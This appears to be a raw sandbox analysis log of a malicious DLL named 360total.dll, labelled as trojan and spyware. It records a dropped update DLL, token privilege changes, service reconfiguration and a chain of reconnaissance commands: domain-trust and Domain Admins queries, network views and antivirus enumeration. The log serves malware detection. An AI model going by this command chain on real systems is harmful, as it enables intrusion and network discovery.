                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57ED9E48_3_000001E3B57ED9E4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5810D188_3_000001E3B5810D18
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E9CBC8_3_000001E3B57E9CBC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5855D688_3_000001E3B5855D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5847C148_3_000001E3B5847C14
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B580FC728_3_000001E3B580FC72
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582BB948_3_000001E3B582BB94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B587EBB88_3_000001E3B587EBB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B585672C8_3_000001E3B585672C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58057688_3_000001E3B5805768
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586D63C8_3_000001E3B586D63C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58096508_3_000001E3B5809650
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58105A08_3_000001E3B58105A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582B5D08_3_000001E3B582B5D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B580F5FB8_3_000001E3B580F5FB
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58405FC8_3_000001E3B58405FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58749408_3_000001E3B5874940
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58589808_3_000001E3B5858980
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58598B08_3_000001E3B58598B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586D8B88_3_000001E3B586D8B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58188248_3_000001E3B5818824
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57F77E08_3_000001E3B57F77E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B581D8348_3_000001E3B581D834
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58478748_3_000001E3B5847874
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B586B3708_3_000001E3B586B370
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E63588_3_000001E3B57E6358
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EE31C8_3_000001E3B57EE31C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583318C8_3_000001E3B583318C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57FD19C8_3_000001E3B57FD19C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58151C08_3_000001E3B58151C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58411CC8_3_000001E3B58411CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58251F88_3_000001E3B58251F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58101FB8_3_000001E3B58101FB
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58555348_3_000001E3B5855534
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58005408_3_000001E3B5800540
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58434988_3_000001E3B5843498
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E85688_3_000001E3B57E8568
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B582F4C48_3_000001E3B582F4C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58484D88_3_000001E3B58484D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58694F08_3_000001E3B58694F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58524308_3_000001E3B5852430
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58374488_3_000001E3B5837448
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583E45C8_3_000001E3B583E45C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58573A08_3_000001E3B58573A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58283EC8_3_000001E3B58283EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B585AF208_3_000001E3B585AF20
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EBEB88_3_000001E3B57EBEB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5829F688_3_000001E3B5829F68
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B587AE848_3_000001E3B587AE84
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5870EC08_3_000001E3B5870EC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5841ECC8_3_000001E3B5841ECC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5837EE88_3_000001E3B5837EE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57FFE388_3_000001E3B57FFE38
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5809D948_3_000001E3B5809D94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5879D948_3_000001E3B5879D94
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5838DF88_3_000001E3B5838DF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58401148_3_000001E3B5840114
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58541348_3_000001E3B5854134
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58501548_3_000001E3B5850154
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58270C08_3_000001E3B58270C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B583F0188_3_000001E3B583F018
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E7FD08_3_000001E3B57E7FD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B58060388_3_000001E3B5806038
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B584A0488_3_000001E3B584A048
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B581E0748_3_000001E3B581E074
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E60788_3_000001E3B57E6078
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll 4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018000CF30 appears 33 times
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005348 appears 71 times
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winDLL@90/16@10/7
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,3_2_0000000180049050
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,3_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_000000018008395A
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle,3_2_000000018004B780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800072A8 CoCreateInstance,3_2_00000001800072A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free,3_2_000000018003A8D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,3_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_updateJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6200
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\runnung
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\Uhad32.tmpJump to behavior
                      Source: 360total.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                      Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.drBinary or memory string: select * from sqlite_sequence;
                      Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: rundll32.exe, rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, Update_27361bf8.dll.4.drBinary or memory string: update sqlite_sequence set seq = 0 where name='MT';
                      Source: rundll32.exe, 00000008.00000003.3366590989.000001E3B5885000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: rundll32.exe, 00000008.00000003.3370598400.000001E3B564C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5636000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3368999510.000001E3B5648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 360total.dll.dllReversingLabs: Detection: 18%
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstation
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groups
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObjectJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homqJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTimeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groupsJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
